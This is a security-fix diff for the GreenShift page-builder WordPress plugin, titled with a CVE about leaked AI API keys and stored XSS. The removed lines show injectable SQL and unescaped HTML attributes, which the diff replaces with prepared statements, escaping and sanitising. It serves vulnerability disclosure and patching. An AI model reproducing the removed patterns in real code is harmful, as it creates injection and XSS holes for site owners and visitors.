CVE-2026-1927: GreenShift – Animation and Page Builder Blocks <= 12.6 – Missing Authorization to Authenticated (Subscriber+) Information Disclosure of AI API Keys and Stored Cross-Site Scripting via custom_css (greenshift-animation-and-page-builder-blocks)

--- a/greenshift-animation-and-page-builder-blocks/blockrender/element/block.php
+++ b/greenshift-animation-and-page-builder-blocks/blockrender/element/block.php
@@ -170,7 +170,7 @@
 						$extra_filters = !empty($block['attrs']['extra_filters']) ? $block['attrs']['extra_filters'] : array();
 						$src = $this->embedsrc($src, $extra_filters);
 					}
-					$p->set_attribute( 'src', $src);
+					$p->set_attribute( 'src', esc_url($src));
 					$html = $p->get_updated_html();
 				}
 			} else if($block['attrs']['tag'] == 'a'){
@@ -240,7 +240,7 @@
 					$p->next_tag();
 					$blockid = 'api_id_'.greenshift_sanitize_id_key($block['attrs']['localId']);
 					$blockid = str_replace('-','_', $blockid);
-					$p->set_attribute( 'data-api-id', $blockid);
+					$p->set_attribute( 'data-api-id', esc_attr($blockid));
 					$p->set_attribute( 'data-dynamic-api', 'true');
 					$p->set_attribute( 'data-dynamic-api-trigger', !empty($block['attrs']['api_filters']['ajaxTrigger']) ? esc_attr($block['attrs']['api_filters']['ajaxTrigger']) : 'load');
 					if(!empty($block['attrs']['api_filters']['ajaxTrigger']) && $block['attrs']['api_filters']['ajaxTrigger'] == 'form' && !empty($block['attrs']['api_filters']['ajaxSelector'])){
@@ -318,7 +318,7 @@
 			}else if($block['attrs']['isVariation'] == 'menu_item_link'){
 				// Check if current link matches the page URL
 				if(!empty($block['attrs']['href'])){
-					$current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
+					$current_url = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . sanitize_text_field(wp_unslash($_SERVER['HTTP_HOST'])) . esc_url_raw(wp_unslash($_SERVER['REQUEST_URI']));
 					$link_url = $block['attrs']['href'];

 					// Remove trailing slashes for comparison
@@ -331,7 +331,7 @@
 						$p->next_tag();
 						$current_class = $p->get_attribute( 'class' );
 						$new_class = $current_class ? $current_class . ' current_item' : 'current_item';
-						$p->set_attribute( 'class', $new_class );
+						$p->set_attribute( 'class', esc_attr($new_class) );
 						$p->set_attribute( 'aria-current', 'page' );
 						$html = $p->get_updated_html();
 					}
@@ -350,7 +350,7 @@
 				$p = new WP_HTML_Tag_Processor( $html );
 				$p->next_tag();
 				$service = esc_attr($block['attrs']['alt']);
-				$p->set_attribute( 'data-social-service', $service);
+				$p->set_attribute( 'data-social-service', esc_attr($service));
 				if($service == 'facebook'){
 					global $post;
 					$link = get_permalink($post->ID);
@@ -403,8 +403,8 @@
 				while ( $p->next_tag() ) {
 					// Skip an element if it's not supposed to be processed.
 					if ( method_exists('WP_HTML_Tag_Processor', 'has_class') && ($p->has_class( 'gs_click_sync' ) || $p->has_class( 'gs_hover_sync' )) ) {
-						$p->set_attribute( 'id', 'gs-trigger-'.$block['attrs']['id'].'-'.$itrigger);
-						$p->set_attribute( 'aria-controls', 'gs-content-'.$block['attrs']['id'].'-'.$itrigger);
+						$p->set_attribute( 'id', 'gs-trigger-'.esc_attr($block['attrs']['id']).'-'.$itrigger);
+						$p->set_attribute( 'aria-controls', 'gs-content-'.esc_attr($block['attrs']['id']).'-'.$itrigger);
 						$itrigger ++;
 					}
 				}
@@ -415,8 +415,8 @@
 				while ( $p->next_tag() ) {
 					// Skip an element if it's not supposed to be processed.
 					if ( method_exists('WP_HTML_Tag_Processor', 'has_class') && ($p->has_class( 'gs_content' )) ) {
-						$p->set_attribute( 'id', 'gs-content-'.$block['attrs']['id'].'-'.$icontent);
-						$p->set_attribute( 'aria-labelledby', 'gs-trigger-'.$block['attrs']['id'].'-'.$icontent);
+						$p->set_attribute( 'id', 'gs-content-'.esc_attr($block['attrs']['id']).'-'.$icontent);
+						$p->set_attribute( 'aria-labelledby', 'gs-trigger-'.esc_attr($block['attrs']['id']).'-'.$icontent);
 						$icontent ++;
 					}
 				}
@@ -522,7 +522,7 @@
 					$turnstile_site_key = apply_filters('greenshift_turnstile_site_key', $turnstile_site_key);
 					if (!empty($turnstile_site_key)) {
 						// Enqueue Turnstile script
-						wp_enqueue_script('cloudflare-turnstile', 'https://challenges.cloudflare.com/turnstile/v0/api.js', array(), null, true);
+						wp_enqueue_script('cloudflare-turnstile', GREENSHIFT_DIR_URL . 'libs/map/api.js', array(), null, true);

 						// Add Turnstile widget before submit button
 						$turnstile_widget = '<div class="cf-turnstile" data-sitekey="' . esc_attr($turnstile_site_key) . '" data-theme="auto"></div>';
@@ -585,9 +585,9 @@
 							}
 						}
 						if($block['attrs']['tag'] == 'video' && !empty($block['attrs']['lazyLoadVideo'])){
-							$p->set_attribute( 'data-src', $value);
+							$p->set_attribute( 'data-src', esc_url($value));
 						} else {
-							$p->set_attribute( 'src', $value);
+							$p->set_attribute( 'src', esc_url($value));
 						}

 						if(!empty($block['attrs']['enableSrcSet']) && !empty($type['type']) && $type['type'] == 'image'){
@@ -599,7 +599,7 @@
 								}
 								$srcset = wp_get_attachment_image_srcset($id, $size);
 								if($srcset){
-									$p->set_attribute( 'srcset', $srcset);
+									$p->set_attribute( 'srcset', esc_attr($srcset));
 								}
 							}
 						}
@@ -614,7 +614,7 @@
 					$value = GSPB_make_dynamic_text($href, $block['attrs'], $block, $block['attrs']['dynamiclink'], $href);
 					if($value){
 						$linknew = apply_filters('greenshiftseo_url_filter', $value);
-						$p->set_attribute( 'href', $linknew);
+						$p->set_attribute( 'href', esc_url($linknew));
 						$html = $p->get_updated_html();
 					}else{
 						return '';
@@ -627,7 +627,7 @@
 					$p->next_tag();
 					$value = GSPB_make_dynamic_text($block['attrs']['poster'], $block['attrs'], $block, $block['attrs']['dynamicextra']);
 					if($value){
-						$p->set_attribute( 'poster', $value);
+						$p->set_attribute( 'poster', esc_url($value));
 						$html = $p->get_updated_html();
 					}else{
 						return '';
@@ -653,7 +653,7 @@
 				$p = new WP_HTML_Tag_Processor( $html );
 				$p->next_tag();
 				foreach($dynamicAttributes as $index=>$value){
-					$p->set_attribute( $value['name'], $value['value']);
+					$p->set_attribute( $value['name'], esc_attr($value['value']));
 				}
 				$html = $p->get_updated_html();
 			}
@@ -664,7 +664,7 @@
 			$anchor = str_replace('{POST_ID}', $post_id, $block['attrs']['anchor']);
 			$p = new WP_HTML_Tag_Processor( $html );
 			$p->next_tag();
-			$p->set_attribute( 'id', $anchor);
+			$p->set_attribute( 'id', esc_attr($anchor));
 			$html = $p->get_updated_html();
 		}
 		if(!empty($block['attrs']['dynamicIndexer'])){
@@ -789,7 +789,7 @@
 				}
 				$data = rtrim($data, ',');
 				$data .= ']';
-				$p->set_attribute( 'data-canvas-controllers', $data );
+				$p->set_attribute( 'data-canvas-controllers', esc_attr($data) );
 				$html = $p->get_updated_html();
 			}

@@ -856,8 +856,8 @@
 	public function process_form()
 	{
 		// Verify nonce for security
-		if (!isset($_POST['_wpnonce']) || !wp_verify_nonce($_POST['_wpnonce'], 'greenshift_form')) {
-			wp_die(__('Security check failed', 'greenshift-animation-and-page-builder-blocks'));
+		if (!isset($_POST['_wpnonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['_wpnonce'])), 'greenshift_form')) {
+			wp_die(esc_html__('Security check failed', 'greenshift-animation-and-page-builder-blocks'));
 		}

 		// Get form type
@@ -903,10 +903,11 @@

 			// Verify Turnstile token with Cloudflare API
 			$verify_url = 'https://challenges.cloudflare.com/turnstile/v0/siteverify';
+			$remote_ip = isset($_SERVER['REMOTE_ADDR']) ? filter_var(wp_unslash($_SERVER['REMOTE_ADDR']), FILTER_VALIDATE_IP) : '';
 			$verify_data = array(
 				'secret' => $turnstile_secret_key,
 				'response' => $turnstile_token,
-				'remoteip' => $_SERVER['REMOTE_ADDR']
+				'remoteip' => $remote_ip ? $remote_ip : ''
 			);

 			$verify_response = wp_remote_post($verify_url, array(
@@ -972,7 +973,8 @@
 		$to = apply_filters('greenshift_contact_form_email', get_option('admin_email'));

 		// Prepare email
-		$subject = sprintf(__('New Contact Form Submission from %s', 'gl-page-builder'), get_bloginfo('name'));
+		/* translators: 1: Blog name */
+		$subject = sprintf(__('New Contact Form Submission from %s', 'greenshift-animation-and-page-builder-blocks'), get_bloginfo('name'));
 		$subject = apply_filters('greenshift_contact_form_subject', $subject);
 		$email_message = sprintf("%sn%sn%s", $name, $email, $message);

--- a/greenshift-animation-and-page-builder-blocks/blockrender/toc/block.php
+++ b/greenshift-animation-and-page-builder-blocks/blockrender/toc/block.php
@@ -261,7 +261,7 @@
               for($j = 0; $j < count($class_matches[1]); $j++) {
                 $headings[$i]["classes"] = explode(" ", $class_matches[1][$j]);
               }
-              $headings[$i]["name"] = strip_tags($matches[3][$i]);
+              $headings[$i]["name"] = wp_strip_all_tags($matches[3][$i]);
             }
             return $headings;
     }
--- a/greenshift-animation-and-page-builder-blocks/build/gspbLibrary.asset.php
+++ b/greenshift-animation-and-page-builder-blocks/build/gspbLibrary.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-dom', 'wp-element', 'wp-i18n', 'wp-polyfill', 'wp-rich-text'), 'version' => '621dec406b405f780002');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-data', 'wp-dom', 'wp-element', 'wp-i18n', 'wp-polyfill', 'wp-rich-text'), 'version' => '6738b1be92db0bfc20e2');
--- a/greenshift-animation-and-page-builder-blocks/build/gspbSiteEditor.asset.php
+++ b/greenshift-animation-and-page-builder-blocks/build/gspbSiteEditor.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-components', 'wp-element', 'wp-i18n'), 'version' => 'ca783a744730fadefc33');
+<?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-components', 'wp-element', 'wp-i18n'), 'version' => 'c73631bb1c141217856c');
--- a/greenshift-animation-and-page-builder-blocks/edd/EddLicensePage.php
+++ b/greenshift-animation-and-page-builder-blocks/edd/EddLicensePage.php
@@ -212,7 +212,7 @@

 				<div class="wp-block-greenshift-blocks-container gspb_container gspb_container-gsbp-89d45563-1559" id="gspb_container-id-gsbp-89d45563-1559">
 					<div class="wp-block-greenshift-blocks-container gspb_container gspb_container-gsbp-efb64efe-d083" id="gspb_container-id-gsbp-efb64efe-d083">
-						<h2 id="gspb_heading-id-gsbp-ca0b0ada-6561" class="gspb_heading gspb_heading-id-gsbp-ca0b0ada-6561 "><?php esc_html_e('Plugins License Options'); ?></h2>
+						<h2 id="gspb_heading-id-gsbp-ca0b0ada-6561" class="gspb_heading gspb_heading-id-gsbp-ca0b0ada-6561 "><?php esc_html_e('Plugins License Options', 'greenshift-animation-and-page-builder-blocks'); ?></h2>
 					</div>


@@ -257,7 +257,7 @@
 		<?php
 		if ('valid' !== $status) {
 			printf(
-				'<input type="password" autocomplete="off" class="regular-text" id="edd_license_key_' . $args['product'] . '" name="edd_license_key_' . $args['product'] . '" value="%s" />',
+				'<input type="password" autocomplete="off" class="regular-text" id="edd_license_key_' . esc_attr($args['product']) . '" name="edd_license_key_' . esc_attr($args['product']) . '" value="%s" />',
 				esc_attr($license)
 			);
 		} else {
@@ -318,7 +318,7 @@
 						$this->licensesData[$key]['status'] = '';
 						$this->licensesData[$key]['expires'] = '';
 					}
-					$this->licensesData[$key]['license'] = $_POST[$data['license_key']];
+					$this->licensesData[$key]['license'] = sanitize_text_field($_POST[$data['license_key']]);
 				}
 			}

@@ -565,7 +565,7 @@
 			if (is_wp_error($response)) {
 				$message = $response->get_error_message();
 			} else {
-				$message = __('An error occurred, please try again.');
+				$message = __('An error occurred, please try again.', 'greenshift-animation-and-page-builder-blocks');
 			}

 			$redirect = add_query_arg(
--- a/greenshift-animation-and-page-builder-blocks/edd/edd_constants.php
+++ b/greenshift-animation-and-page-builder-blocks/edd/edd_constants.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 define( 'EDD_CONSTANTS', true );

 define( 'EDD_GSPB_PLUGIN_LICENSE_PAGE', 'greenshift-license' );
--- a/greenshift-animation-and-page-builder-blocks/includes/helper.php
+++ b/greenshift-animation-and-page-builder-blocks/includes/helper.php
@@ -1060,6 +1060,7 @@
 							$styletocopy = $option['css'];
 							$styletocopy = gspb_get_final_css($styletocopy);
 							$styletocopy = htmlspecialchars_decode($styletocopy);
+							$styletocopy = wp_strip_all_tags($styletocopy);
 							$styleStore->addClassStyle($value, $styletocopy);
 						}
 						else{
@@ -1074,6 +1075,7 @@
 									$styletocopy = $selector['css'];
 									$styletocopy = gspb_get_final_css($styletocopy);
 									$styletocopy = htmlspecialchars_decode($styletocopy);
+									$styletocopy = wp_strip_all_tags($styletocopy);
 									$styleStore->addClassStyle($value.$selector['value'], $styletocopy);
 								}
 								else{
@@ -1382,10 +1384,10 @@
 			}
 		}
 		if(strpos($value, '{{CURRENT_DATE_YMD}}') !== false){
-			$value = str_replace('{{CURRENT_DATE_YMD}}', date('Y-m-d'), $value);
+			$value = str_replace('{{CURRENT_DATE_YMD}}', gmdate('Y-m-d'), $value);
 		}
 		if(strpos($value, '{{CURRENT_DATE_YMD_HMS}}') !== false){
-			$value = str_replace('{{CURRENT_DATE_YMD_HMS}}', date('Y-m-d H:i:s'), $value);
+			$value = str_replace('{{CURRENT_DATE_YMD_HMS}}', gmdate('Y-m-d H:i:s'), $value);
 		}
 		if(strpos($value, '{{TIMESTRING:') !== false){
 			$pattern = '/{TIMESTRING:(.*?)}/';
@@ -1415,7 +1417,8 @@
 			if(!empty($matches[1])){
 				foreach($matches[1] as $val){
 					if(!empty($_COOKIE[$val])){
-						$value = str_replace('{{COOKIE:'.$val.'}}', $_COOKIE[$val], $value);
+						$cookie_value = sanitize_text_field(wp_unslash($_COOKIE[$val]));
+						$value = str_replace('{{COOKIE:'.$val.'}}', $cookie_value, $value);
 					}
 				}
 			}
@@ -1444,7 +1447,7 @@
 						if (count($range) === 2 && is_numeric(trim($range[0])) && is_numeric(trim($range[1]))) {
 							$min = (float) trim($range[0]);
 							$max = (float) trim($range[1]);
-							$replacement = $min + (mt_rand() / mt_getrandmax()) * ($max - $min);
+							$replacement = $min + (wp_rand() / mt_getrandmax()) * ($max - $min);
 						}
 					}
 					// If the value includes "|" then randomly select a value from the list.
--- a/greenshift-animation-and-page-builder-blocks/includes/importer.php
+++ b/greenshift-animation-and-page-builder-blocks/includes/importer.php
@@ -200,7 +200,7 @@
 			header('Content-Type: text/xml; charset=' . get_option('blog_charset'), true);
 		}

-		echo ''.$importcontent;
+		echo $importcontent;
 		exit;
 	}
 }
@@ -214,8 +214,8 @@
  */
 function greenshift_design_importer($file='') {

-	$label_updated = __( 'Updated', 'greenshift-animation-and-page-builder-blocks' );
-	$label_imported = __( 'Imported', 'greenshift-animation-and-page-builder-blocks' );
+	$label_updated = esc_html__( 'Updated', 'greenshift-animation-and-page-builder-blocks' );
+	$label_imported = esc_html__( 'Imported', 'greenshift-animation-and-page-builder-blocks' );

 	if($file){
 		$xml = simplexml_load_file($file);
@@ -228,6 +228,7 @@
 			return false;
 		} else if ( ! file_exists( $file['file'] ) ) {
 			echo '<p><strong>' . esc_html__( 'Sorry, there has been an error.', 'greenshift-animation-and-page-builder-blocks' ) . '</strong><br />';
+			/* translators: code of file */
 			printf( esc_html__( 'The export file could not be found at <code>%s</code>. It is likely that this was caused by a permissions problem.', 'greenshift-animation-and-page-builder-blocks' ), esc_html( $file['file'] ) );
 			echo '</p>';
 			return false;
@@ -328,19 +329,19 @@

 		$post_type_name = '';
 		if ( $post_type === 'wp_template' ) {
-			$post_type_name = __( 'template', 'greenshift-animation-and-page-builder-blocks' );
+			$post_type_name = esc_html__( 'template', 'greenshift-animation-and-page-builder-blocks' );
 		} elseif ( $post_type === 'wp_template_part' ) {
-			$post_type_name = __( 'template part', 'greenshift-animation-and-page-builder-blocks' );
+			$post_type_name = esc_html__( 'template part', 'greenshift-animation-and-page-builder-blocks' );
 		} elseif ( $post_type === 'wp_global_styles' ) {
-			$post_type_name = __( 'custom styles', 'greenshift-animation-and-page-builder-blocks' );
+			$post_type_name = esc_html__( 'custom styles', 'greenshift-animation-and-page-builder-blocks' );
 		}elseif ( $post_type === 'wp_block' ) {
-			$post_type_name = __( 'reusable templates', 'greenshift-animation-and-page-builder-blocks' );
+			$post_type_name = esc_html__( 'reusable templates', 'greenshift-animation-and-page-builder-blocks' );
 		}elseif ( $post_type === 'post' ) {
-			$post_type_name = __( 'posts', 'greenshift-animation-and-page-builder-blocks' );
+			$post_type_name = esc_html__( 'posts', 'greenshift-animation-and-page-builder-blocks' );
 		}elseif ( $post_type === 'page' ) {
-			$post_type_name = __( 'pages', 'greenshift-animation-and-page-builder-blocks' );
+			$post_type_name = esc_html__( 'pages', 'greenshift-animation-and-page-builder-blocks' );
 		}elseif ( $post_type === 'product' ) {
-			$post_type_name = __( 'products', 'greenshift-animation-and-page-builder-blocks' );
+			$post_type_name = esc_html__( 'products', 'greenshift-animation-and-page-builder-blocks' );
 		}else{
 			$post_type_name = $post_type;
 		}
@@ -521,13 +522,13 @@
 	if(!empty($updated_types)){
 		$updated_types = array_unique($updated_types);
 		$updated_types = implode(', ', $updated_types);
-		echo '<li class="imported is-font-weight-600"><span class="dashicons-before dashicons-saved"></span> ' . esc_html( $label_updated ) . ': ' . $updated_types .'</li>';
+		echo '<li class="imported is-font-weight-600"><span class="dashicons-before dashicons-saved"></span> ' . esc_html( $label_updated ) . ': ' .esc_attr( $updated_types) .'</li>';
 	}

 	if(!empty($new_types)){
 		$new_types = array_unique($new_types);
 		$new_types = implode(', ', $new_types);
-		echo '<li class="imported is-font-weight-600"><span class="dashicons-before dashicons-saved"></span> ' . esc_html( $label_imported ) . ': ' . $new_types .'</li>';
+		echo '<li class="imported is-font-weight-600"><span class="dashicons-before dashicons-saved"></span> ' . esc_html( $label_imported ) . ': ' . esc_attr($new_types) .'</li>';
 	}

 	if(!empty($thumbnails_old_ids)){
@@ -610,7 +611,7 @@

 			$post_id_update = 0;

-			$template_posts = $wpdb->get_results( "SELECT ID FROM $wpdb->posts WHERE post_name = '" . $post_name . "' AND post_type = '" . $post_type . "'" );
+			$template_posts = $wpdb->get_results( $wpdb->prepare( "SELECT ID FROM $wpdb->posts WHERE post_name = %s AND post_type = %s", $post_name, $post_type ) );

 			if ( $template_posts ) {
 				foreach ( $template_posts as $template_post ) {
@@ -632,7 +633,7 @@

 		} else  {

-			$post_id = $wpdb->get_row( "SELECT ID FROM $wpdb->posts WHERE post_name = '" . $post_name . "' AND post_type = '" . $post_type . "'" );
+			$post_id = $wpdb->get_row( $wpdb->prepare( "SELECT ID FROM $wpdb->posts WHERE post_name = %s AND post_type = %s", $post_name, $post_type ) );
 			if ( $post_id ) {
 				$todo = array( 'post_id' => $post_id->ID, 'action' => 'update' );
 			} else {
@@ -721,7 +722,7 @@
 function greenshift_process_attachment( $post, $url ) {

 		// Extract the file name from the URL.
-		$path      = parse_url( $url, PHP_URL_PATH );
+		$path      = wp_parse_url( $url, PHP_URL_PATH );
 		$file_name = '';
 		if ( is_string( $path ) ) {
 			$file_name = basename( $path );
@@ -733,7 +734,7 @@

 		$tmp_file_name = wp_tempnam( $file_name );
 		if ( ! $tmp_file_name ) {
-			return new WP_Error( 'import_no_file', __( 'Could not create temporary file.', 'greenshift-animation-and-page-builder-blocks' ) );
+			return new WP_Error( 'import_no_file', esc_html__( 'Could not create temporary file.', 'greenshift-animation-and-page-builder-blocks' ) );
 		}

 		// Fetch the remote URL and write it to the placeholder file.
@@ -750,12 +751,12 @@
 		);

 		if ( is_wp_error( $remote_response ) ) {
-			@unlink( $tmp_file_name );
+			wp_delete_file( $tmp_file_name );
 			return new WP_Error(
 				'import_file_error',
 				sprintf(
 					/* translators: 1: The WordPress error message. 2: The WordPress error code. */
-					__( 'Request failed due to an error: %1$s (%2$s)', 'greenshift-animation-and-page-builder-blocks' ),
+					esc_html__( 'Request failed due to an error: %1$s (%2$s)', 'greenshift-animation-and-page-builder-blocks' ),
 					esc_html( $remote_response->get_error_message() ),
 					esc_html( $remote_response->get_error_code() )
 				)
@@ -766,12 +767,12 @@

 		// Make sure the fetch was successful.
 		if ( 200 !== $remote_response_code ) {
-			@unlink( $tmp_file_name );
+			wp_delete_file( $tmp_file_name );
 			return new WP_Error(
 				'import_file_error',
 				sprintf(
 					/* translators: 1: The HTTP error message. 2: The HTTP error code. */
-					__( 'Remote server returned the following unexpected result: %1$s (%2$s)', 'greenshift-animation-and-page-builder-blocks' ),
+					esc_html__( 'Remote server returned the following unexpected result: %1$s (%2$s)', 'greenshift-animation-and-page-builder-blocks' ),
 					get_status_header_desc( $remote_response_code ),
 					esc_html( $remote_response_code )
 				)
@@ -782,26 +783,27 @@

 		// Request failed.
 		if ( ! $headers ) {
-			@unlink( $tmp_file_name );
-			return new WP_Error( 'import_file_error', __( 'Remote server did not respond', 'greenshift-animation-and-page-builder-blocks' ) );
+			wp_delete_file( $tmp_file_name );
+			return new WP_Error( 'import_file_error', esc_html__( 'Remote server did not respond', 'greenshift-animation-and-page-builder-blocks' ) );
 		}

 		$filesize = (int) filesize( $tmp_file_name );

 		if ( 0 === $filesize ) {
-			@unlink( $tmp_file_name );
-			return new WP_Error( 'import_file_error', __( 'Zero size file downloaded', 'greenshift-animation-and-page-builder-blocks' ) );
+			wp_delete_file( $tmp_file_name );
+			return new WP_Error( 'import_file_error', esc_html__( 'Zero size file downloaded', 'greenshift-animation-and-page-builder-blocks' ) );
 		}

 		if ( ! isset( $headers['content-encoding'] ) && isset( $headers['content-length'] ) && $filesize !== (int) $headers['content-length'] ) {
-			@unlink( $tmp_file_name );
-			return new WP_Error( 'import_file_error', __( 'Downloaded file has incorrect size', 'greenshift-animation-and-page-builder-blocks' ) );
+			wp_delete_file( $tmp_file_name );
+			return new WP_Error( 'import_file_error', esc_html__( 'Downloaded file has incorrect size', 'greenshift-animation-and-page-builder-blocks' ) );
 		}

 		$max_size = (int) apply_filters( 'import_attachment_size_limit', 0 );
 		if ( ! empty( $max_size ) && $filesize > $max_size ) {
-			@unlink( $tmp_file_name );
-			return new WP_Error( 'import_file_error', sprintf( __( 'Remote file is too large, limit is %s', 'greenshift-animation-and-page-builder-blocks' ), size_format( $max_size ) ) );
+			wp_delete_file( $tmp_file_name );
+			/* translators: limit file size */
+			return new WP_Error( 'import_file_error', sprintf( esc_html__( 'Remote file is too large, limit is %s', 'greenshift-animation-and-page-builder-blocks' ), size_format( $max_size ) ) );
 		}

 		// Handle the upload like _wp_handle_upload() does.
@@ -816,7 +818,7 @@
 		}

 		if ( ( ! $type || ! $ext ) && ! current_user_can( 'unfiltered_upload' ) ) {
-			return new WP_Error( 'import_file_error', __( 'Sorry, this file type is not permitted for security reasons.', 'greenshift-animation-and-page-builder-blocks' ) );
+			return new WP_Error( 'import_file_error', esc_html__( 'Sorry, this file type is not permitted for security reasons.', 'greenshift-animation-and-page-builder-blocks' ) );
 		}

 		$uploads = wp_upload_dir( $post['upload_date'] );
@@ -830,8 +832,8 @@
 		$move_new_file = copy( $tmp_file_name, $new_file );

 		if ( ! $move_new_file ) {
-			@unlink( $tmp_file_name );
-			return new WP_Error( 'import_file_error', __( 'The uploaded file could not be moved', 'greenshift-animation-and-page-builder-blocks' ) );
+			wp_delete_file( $tmp_file_name );
+			return new WP_Error( 'import_file_error', esc_html__( 'The uploaded file could not be moved', 'greenshift-animation-and-page-builder-blocks' ) );
 		}

 		// Set correct file permissions.
@@ -855,7 +857,7 @@
 	if ( $info ) {
 		$post['post_mime_type'] = $info['type'];
 	} else {
-		return new WP_Error( 'attachment_processing_error', __( 'Invalid file type', 'greenshift-animation-and-page-builder-blocks' ) );
+		return new WP_Error( 'attachment_processing_error', esc_html__( 'Invalid file type', 'greenshift-animation-and-page-builder-blocks' ) );
 	}

 	$post['guid'] = $upload['url'];
--- a/greenshift-animation-and-page-builder-blocks/includes/jsoptimization.php
+++ b/greenshift-animation-and-page-builder-blocks/includes/jsoptimization.php
@@ -1,5 +1,5 @@
 <?php
-
+if ( ! defined( 'ABSPATH' ) ) exit;

 class GSPBLazyOptimization {

@@ -42,7 +42,7 @@

 			$allowedpagesArray = array( );

-    		$current_url = home_url( $_SERVER['REQUEST_URI'] );
+    		$current_url = home_url( esc_url_raw( wp_unslash( $_SERVER['REQUEST_URI'] ) ) );

 			$delay_js_page_list = !empty($global_settings['jsdelay']['delay_js_page_list']) ? $global_settings['jsdelay']['delay_js_page_list'] : '';

--- a/greenshift-animation-and-page-builder-blocks/init.php
+++ b/greenshift-animation-and-page-builder-blocks/init.php
@@ -674,7 +674,7 @@

 	wp_register_script(
 		'gspb_osmap',
-		'https://unpkg.com/leaflet@1.9.3/dist/leaflet.js',
+		GREENSHIFT_DIR_URL . 'libs/map/leaflet.js',
 		array(),
 		'1.9.3',
 		true
@@ -682,7 +682,7 @@

 	wp_register_style(
 		'gspb_osmap_style',
-		'https://unpkg.com/leaflet@1.9.3/dist/leaflet.css',
+		GREENSHIFT_DIR_URL . 'libs/map/leaflet.css',
 		array(),
 		'1.9.3'
 	);
@@ -824,7 +824,7 @@
 		'delete_with_user'      =>  false,
 		'template' 				=>  $blocktemplate,
 		'template_lock'         =>  'all',
-		'label'    				=>  __( 'GreenShift Stylebook', 'greenshift-animation-and-page-builder-blocks' ),
+		'label'    				=>  esc_html__( 'GreenShift Stylebook', 'greenshift-animation-and-page-builder-blocks' ),
 	);
 	register_post_type( 'gspbstylebook', $args );

@@ -947,7 +947,7 @@
 				if(!$source){return '';}
 				$p = new WP_HTML_Tag_Processor( $html );
 				if ( $p->next_tag( 'spline-viewer' )) {
-					$p->set_attribute( 'url', $source);
+					$p->set_attribute( 'url', esc_url($source));
 				}
 				$html = $p->get_updated_html();
 			}
@@ -980,7 +980,7 @@
 				if(empty($end)){return '';}
 				$p = new WP_HTML_Tag_Processor( $html );
 				if ( $p->next_tag( array( 'class_name' => 'gs-counter' ) ) ) {
-					$p->set_attribute( 'data-end', $end);
+					$p->set_attribute( 'data-end', esc_attr($end));
 				}
 				$html = $p->get_updated_html();
 			}
@@ -1206,7 +1206,7 @@
 				if($endtime){
 					$p = new WP_HTML_Tag_Processor( $html );
 					if ( $p->next_tag( array( 'class_name' => 'gs-countdown' ) ) ) {
-						$p->set_attribute( 'data-endtime', $endtime);
+						$p->set_attribute( 'data-endtime', esc_attr($endtime));
 					}
 					$html = $p->get_updated_html();

@@ -1242,7 +1242,7 @@

 				$p = new WP_HTML_Tag_Processor( $html );
 				if ( $p->next_tag( array( 'class_name' => 'gs-countdown' ) ) ) {
-					$p->set_attribute( 'data-endtime', $formattedDateTime);
+					$p->set_attribute( 'data-endtime', esc_attr($formattedDateTime));
 				}
 				$html = $p->get_updated_html();
 			}
@@ -1260,7 +1260,7 @@
 						}
 						$p = new WP_HTML_Tag_Processor( $html );
 						if ( $p->next_tag( array( 'class_name' => 'gs-countdown' ) ) ) {
-							$p->set_attribute( 'data-endtime', $endtime);
+							$p->set_attribute( 'data-endtime', esc_attr($endtime));
 						}
 						$html = $p->get_updated_html();
 					}
@@ -1397,7 +1397,7 @@
 				if(!$td_url){return '';}
 				$p = new WP_HTML_Tag_Processor( $html );
 				if ( $p->next_tag( 'model-viewer' )) {
-					$p->set_attribute( 'src', $td_url);
+					$p->set_attribute( 'src', esc_url($td_url));
 				}
 				$html = $p->get_updated_html();
 			}
@@ -1412,7 +1412,7 @@
 				}
 				$p = new WP_HTML_Tag_Processor( $html );
 				if ( $p->next_tag( 'model-viewer' )) {
-					$p->set_attribute( 'ios-src', $usdz_url);
+					$p->set_attribute( 'ios-src', esc_url($usdz_url));
 				}
 				$html = $p->get_updated_html();
 			}
@@ -1443,13 +1443,13 @@
 					$replaced = GSPB_field_array_to_value($replaced, ', ');
 					if($replaced){
 						if ( $p->next_tag( array( 'class_name' => 'gs-video-element' ) ) ) {
-							$p->set_attribute( 'data-src', $replaced);
+							$p->set_attribute( 'data-src', esc_url($replaced));
 						}
 						if ( $p->next_tag( array( 'class_name' => 'gs-video-element' ) ) ) {
-							$p->set_attribute( 'data-src', $replaced);
+							$p->set_attribute( 'data-src', esc_url($replaced));
 						}
 						if($p->next_tag( array( 'tag_name' => 'meta') ) && $p->get_attribute( 'itemprop' ) == 'embedUrl' ) {
-							$p->set_attribute( 'content', $replaced);
+							$p->set_attribute( 'content', esc_attr($replaced));
 						}
 						//Poster
 						if($block['attrs']['provider'] != 'video'){
@@ -1468,10 +1468,10 @@
 						$replaced = GSPB_make_dynamic_video($html, $block['attrs'], $block, $field, $src, true);
 						if($replaced){
 							if ( $p->next_tag( array( 'class_name' => 'gs-video-element' ) ) ) {
-								$p->set_attribute( 'data-src', $replaced);
+								$p->set_attribute( 'data-src', esc_url($replaced));
 							}
 							if($p->next_tag( array( 'tag_name' => 'meta') ) && $p->get_attribute( 'itemprop' ) == 'embedUrl' ) {
-								$p->set_attribute( 'content', $replaced);
+								$p->set_attribute( 'content', esc_attr($replaced));
 							}

 							//Poster
@@ -1722,9 +1722,10 @@
 					if(($type == 'preset' || $type == 'global') && !empty($class['value'])){
 						$css = greenshift_get_style_from_class_array($class['value'], $type, $inline = false);
 						if($css){
-							$class_style = '<style>' . wp_kses_post($css) . '</style>';
+							$class_style = $css;
 							$class_style = gspb_get_final_css($class_style);
 							$class_style = htmlspecialchars_decode($class_style);
+							$class_style = '<style>' . wp_strip_all_tags($class_style) . '</style>';
